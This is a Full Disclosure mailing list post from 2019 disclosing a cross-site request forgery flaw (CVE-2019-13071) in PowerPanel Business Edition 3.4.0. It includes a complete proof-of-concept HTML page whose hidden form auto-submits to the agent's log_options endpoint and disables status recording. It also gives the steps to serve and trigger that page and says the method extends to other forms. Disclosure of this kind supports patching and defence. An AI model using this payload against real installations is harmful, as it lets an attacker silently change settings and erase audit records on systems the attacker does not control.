Full Disclosure mailing list archives
PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery
From: Joey Lane via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 9 Jul 2019 17:19:27 -0500
# Exploit Title: PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery # Date: 7/9/2019 # Exploit Author: Joey Lane # Vendor Homepage: https://www.cyberpowersystems.com # Version: 3.4.0 # Tested on: Ubuntu 16.04 # CVE : CVE-2019-13071 # Reported to vendor on 5/25/2019, no acknowledgement. The Agent/Center component of PowerPanel Business Edition is vulnerable to cross site request forgery. This can be exploited by tricking an authenticated user into visiting a web page controlled by a malicious person. The following example uses CSRF to disable Status Recording under the Logs / Settings page. Create a file named 'csrf.html' on a local workstation with the following contents: <iframe style="display:none" name="csrf-frame"></iframe> <div style="display: none;"> <form method='POST' action='http://(A VALID HOST NAME):3052/agent/log_options' target="csrf-frame" id="csrf-form"> <input type='hidden' name='value(recordingEnable)' value='no'> <input type='hidden' name='value(recordingInterval)' value='10'> <input type='hidden' name='value(periodToRemoveRecord)' value='2'> <input type='hidden' name='value(clearAllStatusLogs)' value='no'> <input type='hidden' name='value(type)' value='records'> <input type='hidden' name='value(action)' value='Apply'> <input type='hidden' name='value(button)' value='Apply'> <input type='submit' value='submit'> </form> </div> <script>document.getElementById("csrf-form").submit()</script> Serve the file using python or any other web server: python -m SimpleHTTPServer 8000 Visit the local page in a browser while logged into PowerPanel Business Edition: http://localhost:8000/csrf.html The hidden form is submitted in the background, and will disable Status Recording. This could be adapted to exploit other forms in the web application as well. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- PowerPanel Business Edition 3.4.0 - Cross Site Request Forgery Joey Lane via Fulldisclosure (Jul 09)